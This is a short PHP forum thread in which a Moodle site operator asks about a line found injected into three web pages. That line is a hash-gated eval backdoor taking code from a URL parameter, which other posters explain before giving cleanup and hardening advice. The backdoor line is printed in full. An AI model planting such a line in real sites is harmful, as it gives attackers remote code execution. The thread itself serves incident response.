Newbie Question sorry

[JacH]

I am completely new to PHP.

 

Could some just explain this line of code to me

 

 

if ( md5(@$_GET["rnk"]) == "2d8580663839881184c4acff7e0af63d" ) eval (stripcslashes (@$_GET["cd"]));

 

It was placed at the top of 3 of our web pages - I guess the string is an encryption and is a hack of some sort

 

thanks

[dennismonsewicz]

Well the md5 is a sort of encryption while the @ symbol in front of the variables will cause them to not show errors so you won't notice them being there.

 

If this was placed at the top of some of your files (possibly more) I would definitely tighten up security on your web server

[PFMaBiSmAd]

It checks if the md5() of $_GET["rnk"] is equal to the value shown and if it is it executes the php code that was supplied in $_GET["cd"].

 

You could check your server logs to see what sort php code was supplied on the end of the URL's in $_GET["cd"].

 

Of greater concern is how your files were modified to add the line of code to them in the first place.

[premiso]

Sounds like you have been hacked to me. That will allow any user who knows the hash for rnk to execute any code on your server.

 

Scary stuff man. Check logs, contact host and remove that from every page is it is on.

 

If your site has an uploader, I would look into that to increase security on it, as that could be the source, or if you allow dynamic including of files, "include($_GET['file'])" I would also look into securing that too.

[JacH]

Thanks guys for all your replies.

 

Yep we have found a small door in our IIS (we are using IIS and PHP to run Moodle) so we are now modifying our permissions.

 

I can only hope we have found it in time as only one of the files led to some disfunctionallity but noticing the date it was modified led us to the other 3.

[JacH]

We have now fixed our permissions (fingers and legs crossed)

 

The hacker managed to upload a file named license.php from which he could run an uploader.